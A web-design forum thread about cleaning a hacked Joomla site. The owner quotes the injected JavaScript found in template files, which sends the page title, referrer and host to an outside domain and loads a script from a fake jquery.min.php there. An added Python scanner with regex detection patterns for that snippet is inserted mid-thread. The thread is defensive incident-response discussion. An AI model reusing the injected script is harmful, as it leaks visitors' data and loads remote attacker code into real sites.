SOLVED MW:JS:GEN2?web.js.malware.fake​_jquery.001

    • Riccardo
    • Elite Rocketeer
    • Posts: 1078
    • Thanks: 28

    SOLVED MW:JS:GEN2?web.js.malware.fake​_jquery.001

    Posted 8 years 10 months ago
    • I find these errors:

      When accessing the Joomla admin:
      Notice: Undefined index: n836ecb2 in /var/www/vhosts/domainname.com/httpdocs/domainname.info/libraries/legacy/controller/legacy.php on line 1

      When visiting the website (public site):
      Notice: Undefined index: n836ecb2 in /var/www/vhosts/domainname.com/httpdocs/domainname.info/libraries/legacy/controller/legacy.php on line 1

      I have scanned the website with BitDefender and nothing was found, but sucuri.net reports the infection.

      Has anyone already solved this situation and can tell me which infected components need to be overwritten?
      I have instructed my system analyst and hoster to do a malware cleanup on the system side, but I would like to ask if you have other experience, in order to speed up the procedure...
    • Last Edit: 8 years 10 months ago by MrT.
    • Riccardo Rausch
      www.rausch.it
    • MrT
    • Preeminent Rocketeer
    • Posts: 101084
    • Thanks: 13482
    • Web Designer/Developer

    Re: SOLVED MW:JS:GEN2?web.js.malware.fake​_jquery.001

    Posted 8 years 10 months ago
    • You have been hacked. As I have told you previously, BitDefender will not protect you against being hacked.

      You will have to manually delete all the spoof files - they typically have "01" "02" etc in their file names. We have seen this hack numerous times - it comes about from the recent Joomla security weaknesses that were corrected between 3.4.6 and 3.4.8. Using a good security product would also have prevented this (e.g. Akeeba Admin Tools Pro or RSFirewall).

      Regards, Mark.
    • Please search forums before posting. Please make sure your post includes the version of the CMS you are using and a link to the problem. Annotations on screenshots can also be helpful to explain problems/goals. Please use the "secure" tab for confidential information.
    • Riccardo
    • Elite Rocketeer
    • Posts: 1078
    • Thanks: 28

    Re: SOLVED MW:JS:GEN2?web.js.malware.fake​_jquery.001

    Posted 8 years 10 months ago
    • I found the malicious code in the index.php file of all three templates (rt_cerulean, beez3 and protostar), and had to delete and copy the folders "\libraries\legacy" and "\libraries\rokcommon" (the complete folders with all the files and subdirectories).
      Then I reinstalled the template Cerulean 1.6 and the Gantry framework.
      Now the two errors are gone.
      I scanned the site with quttera.com, which has not found any more infections. Sucuri.net continues to report the malware, but I read on the web that there are many doubts about its reliability.
      As recommended, I immediately installed Akeeba Admin Tools Professional 3.6.8, but it seems that there is still something wrong because the site has become very slow.

      Could someone tell me whether it still depends on the site (Gantry?), or whether I was wrong in setting up the Akeeba component?

      This is the malicious code I found:
      <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://americanexceptionalism.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
    • Last Edit: 8 years 10 months ago by Riccardo.
    • Riccardo Rausch
      www.rausch.it
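The injected snippet quoted in the post above can be hunted across the whole site tree rather than only in the files where it was first noticed. This is an added example, not part of the original thread: the indicator patterns are derived from the quoted snippet, while the names `match_indicators`, `scan_tree`, the extension list, the two-indicator threshold and the `example.invalid` host in the sample are assumptions made for the illustration.

```python
import re
import tempfile
from pathlib import Path

# Indicators derived from the injected snippet quoted in the post (names are hypothetical).
INDICATORS = {
    "fake_jquery_php": re.compile(r"jquery(?:\.min)?\.php", re.I),
    "referrer_exfil": re.compile(r"se_referrer\s*=\s*encodeURIComponent\(\s*document\.referrer"),
    "keyword_exfil": re.compile(r"default_keyword\s*=\s*encodeURIComponent\(\s*document\.title"),
    "split_script_tag": re.compile(r"""document\.write\([^;]*['"]<['"]\s*\+\s*['"]/script>"""),
}
SCAN_EXT = {".php", ".js", ".html", ".htm"}  # assumption: file types worth scanning
THRESHOLD = 2  # assumption: two indicators in one file before it is flagged

def match_indicators(text):
    """Return the sorted names of all indicators present in text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def scan_tree(root):
    """Map relative path -> indicator names for every file reaching THRESHOLD."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_EXT:
            hits = match_indicators(path.read_text(encoding="utf-8", errors="replace"))
            if len(hits) >= THRESHOLD:
                findings[path.relative_to(root).as_posix()] = hits
    return findings

def demo():
    injected = (  # constructed sample modelled on the quoted snippet; host is a placeholder
        "<script>var default_keyword = encodeURIComponent(document.title);"
        " var se_referrer = encodeURIComponent(document.referrer);"
        ' var base = "http://example.invalid/js/jquery.min.php";'
        " document.write('<script src=\"' + base + '\">' + '<' + '/script>');</script>"
    )
    files = {  # constructed miniature site tree: one infected template, two clean files
        "templates/protostar/index.php": "<?php echo 'ok'; ?>\n" + injected,
        "templates/beez3/index.php": "<?php echo 'clean'; ?>",
        "media/jui/js/jquery.min.js": "/* genuine jQuery library */",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in files.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

Pointing `scan_tree` at a local copy of the document root lists every file carrying the snippet; a clean result only covers this one signature, not other files an intruder may have left behind.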
    • MrT
    • Preeminent Rocketeer
    • Posts: 101084
    • Thanks: 13482
    • Web Designer/Developer

    Re: SOLVED MW:JS:GEN2?web.js.malware.fake​_jquery.001

    Posted 8 years 10 months ago
    • The malicious code just gets randomly put in places to hide it... I've seen it in all sorts of different places on member sites. There is no significance to where the malicious code resides.

      I don't understand your question really (Gantry vs Akeeba)? I use Akeeba Admin Tools Pro on many sites and it does not slow them down for me. But if you think it has in your case then Akeeba are the people to ask.

      Gantry 5 is required for the template you are using. Akeeba Admin Tools is a security product that is installed in Joomla. Neither has any dependency on the other.

      Don't forget also that you have to configure Akeeba Admin Tools Pro in WAF and .htaccess Maker - it doesn't just "work" without you configuring it properly.

      Regards, Mark.
    • Riccardo
    • Elite Rocketeer
    • Posts: 1078
    • Thanks: 28

    Re: SOLVED MW:JS:GEN2?web.js.malware.fake​_jquery.001

    Posted 8 years 10 months ago
    • I probably misspoke. I mentioned Gantry as possibly responsible for the slowdown because this bug happened after its re-installation. It was a simple question, given that I have never had such a defect on a single website.

      I set up Akeeba as recommended by the manufacturer; in particular I followed the recommended presets, especially for the firewall and aggressive IP blocking.

      Before opening a ticket with Akeeba, I wanted to get an idea on the basis of your experience.
    • Last Edit: 8 years 10 months ago by Riccardo.
    • Riccardo Rausch
      www.rausch.it
    • MrT
    • Preeminent Rocketeer
    • Posts: 101084
    • Thanks: 13482
    • Web Designer/Developer

    Re: SOLVED MW:JS:GEN2?web.js.malware.fake​_jquery.001

    Posted 8 years 10 months ago
    • Why would Gantry slow things down? If you use a Gantry 5 template then you need Gantry?

      I use both Gantry 5 and Akeeba Admin Tools Pro (AATP) on many sites and have no issues.

      If you open a ticket on Akeeba they're going to want to see specific timing examples (AATP on and AATP off), so make sure you supply that to them. I can't believe the difference is anything significant.

      Regards, Mark.
    • Riccardo
    • Elite Rocketeer
    • Posts: 1078
    • Thanks: 28

    Re: SOLVED MW:JS:GEN2?web.js.malware.fake​_jquery.001

    Posted 8 years 10 months ago
    • Cerulean is from 2012 and uses (by design) Gantry 4.1.29 (see download section). I haven't upgraded this website to Gantry 5 because this is a hobby site that is active only as a memory archive.

      While writing this post, I noticed a link that is triggered by clicking on the menu items and points to a Russian website. I fear that there is still malicious code...
    • Riccardo Rausch
      www.rausch.it
    • MrT
    • Preeminent Rocketeer
    • Posts: 101084
    • Thanks: 13482
    • Web Designer/Developer

    Re: SOLVED MW:JS:GEN2?web.js.malware.fake​_jquery.001

    Posted 8 years 10 months ago
    • Ah OK, as you posted in Configuration and Security I did not know what template you were using and just assumed it was G5 (my bad). Yes, Cerulean is G4. Yes, it sounds like you still have malicious code on your site and that will definitely slow things down. AATP can remedy an already hacked site it can only protect you against further hacks.

      Regards, Mark.
    • Riccardo
    • Elite Rocketeer
    • Posts: 1078
    • Thanks: 28

    Re: SOLVED MW:JS:GEN2?web.js.malware.fake​_jquery.001

    Posted 8 years 10 months ago
    • As they say, desperate times - desperate measures! I downloaded the version from Joomla (the one from the website), unzipped it locally, removed the configuration files and did a nice FTP upload overwriting all 4900 Joomla files.
      Now I'm taking a break and tomorrow I will see if this plugin (that generates this malicious code) is still present.
    • Last Edit: 8 years 10 months ago by Riccardo.
    • Riccardo Rausch
      www.rausch.it
    • MrT
    • Preeminent Rocketeer
    • Posts: 101084
    • Thanks: 13482
    • Web Designer/Developer

    Re: SOLVED MW:JS:GEN2?web.js.malware.fake​_jquery.001

    Posted 8 years 10 months ago
    • Ok, again please let us know the outcome.

      Regards, Mark.